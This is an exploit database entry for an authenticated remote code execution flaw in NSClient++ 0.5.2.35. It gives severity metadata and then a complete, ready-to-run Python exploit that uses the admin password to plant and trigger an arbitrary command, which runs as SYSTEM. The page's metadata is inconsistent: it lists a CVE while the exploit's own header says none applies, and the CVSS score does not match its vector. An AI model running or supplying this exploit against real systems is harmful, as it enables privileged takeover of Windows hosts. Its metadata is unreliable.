Exploitalert - Database of Exploits

NSClient++ 0.5.2.35 Authenticated Remote Code Execution

CVE	Category	Price	Severity
CVE-2020-11652	CWE-269	$N/A	High

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2020-04-22

CVSS	EPSS	EPSSP
CVSS:6.5/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H	0.0769667	0.729933

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2020040145

NSClient++ 0.5.2.35 Authenticated Remote Code Execution

# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution # Google Dork: N/A # Date: 2020-04-20 # Exploit Author: kindredsec # Vendor Homepage: https://nsclient.org/ # Software Link: https://nsclient.org/download/ # Version: 0.5.2.35 # Tested on: Microsoft Windows 10 Pro (x64) # CVE: N/A # # NSClient++ is a monitoring agent that has the option to run external scripts. # This feature can allow an attacker, given they have credentials, the ability to execute # arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt # Default, this leads to privileged code execution. #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup as bs import urllib3 import json import sys import random import string import time import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def generateName(): letters = string.ascii_lowercase + string.ascii_uppercase return ''.join(random.choice(letters) for i in range(random.randint(8,13))) def printStatus(message, msg_type): C_YELLOW = '\033[1;33m' C_RESET = '\033[0m' C_GREEN = '\033[1;32m' C_RED = '\033[1;31m' if msg_type == "good": green_plus = C_GREEN + "[+]" + C_RESET string = green_plus + " " + message elif msg_type == "info": yellow_ex = C_YELLOW + "[!]" + C_RESET string = yellow_ex + " " + message elif msg_type == "bad": red_minus = C_RED + "[-]" + C_RESET string = red_minus + " " + message print(string) # This function adds a new external script containing the desired # command, then saves the configuration def configurePayload(session, cmd, key): printStatus("Configuring Script with Specified Payload . . .", "info") endpoint = "/settings/query.json" node = { "path" : "/settings/external scripts/scripts", "key" : key } value = { "string_data" : cmd } update = { "node" : node , "value" : value } payload = [ { "plugin_id" : "1234", "update" : update } ] json_data = { "type" : "SettingsRequestMessage", "payload" : payload } out = session.post(url = base_url + endpoint, json=json_data, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") sys.exit(1) printStatus("Added External Script (name: " + key + ")", "good") time.sleep(3) printStatus("Saving Configuration . . .", "info") header = { "version" : "1" } payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } session.post(url = base_url + endpoint, json=json_data, verify=False) # Since the application needs to be restarted after making changes, # this function reloads the application, and waits for it to come back. def reloadConfig(session): printStatus("Reloading Application . . .", "info") endpoint = "/core/reload" session.get(url = base_url + endpoint, verify=False) # Wait until the application successfully reloads by making a request # every 10 seconds until it responds. printStatus("Waiting for Application to reload . . .", "info") time.sleep(10) response = False count = 0 while not response: try: out = session.get(url = base_url, verify=False, timeout=10) if len(out.content) > 0: response = True except: count += 1 if count > 10: printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") sys.exit(1) else: continue # This function makes the call to the new external script to # ultimately execute the code. def triggerPayload(session, key): printStatus("Triggering payload, should execute shortly . . .", "info") endpoint = "/query/" + key try: session.get(url = base_url + endpoint, verify=False, timeout=10) except requests.exceptions.ReadTimeout: printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") sys.exit(0) # Before setting up the exploit, this function makes sure the # required feature (External Scripts) is enabled on the application. def enableFeature(session): printStatus("Enabling External Scripts Module . . .", "info") endpoint = "/registry/control/module/load" params = { "name" : "CheckExternalScripts" } out = session.get(url = base_url + endpoint, params=params, verify=False) if "STATUS_OK" not in str(out.content): printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") sys.exit(1) # This function obtains an authentication token that gets added to all # remaining headers. def getAuthToken(session): printStatus("Obtaining Authentication Token . . .", "info") endpoint = "/auth/token" params = { "password" : password } auth = session.get(url = base_url + endpoint, params=params, verify=False) if "auth token" in str(auth.content): j = json.loads(auth.content) authToken = j["auth token"] printStatus("Got auth token: " + authToken, "good") return authToken else: printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad") sys.exit(1) parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') args = parser.parse_args() if len(sys.argv) < 4: parser.print_help() sys.exit(1) # Build base URL, grab needed arguments base_url = "https://" + args.t + ":" + args.P printStatus("Targeting base URL " + base_url, "info") password = args.p cmd = args.c # Get first auth token, and add it to headers of session s = requests.session() token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Generate a random name, enable the feature, add the payload, # then reload. randKey = generateName() enableFeature(s) configurePayload(s, cmd, randKey) reloadConfig(s) # Since application was reloaded, need a new auth token. token = getAuthToken(s) s.headers.update({ "TOKEN" : token}) # Execute our code. triggerPayload(s, randKey)

Impressum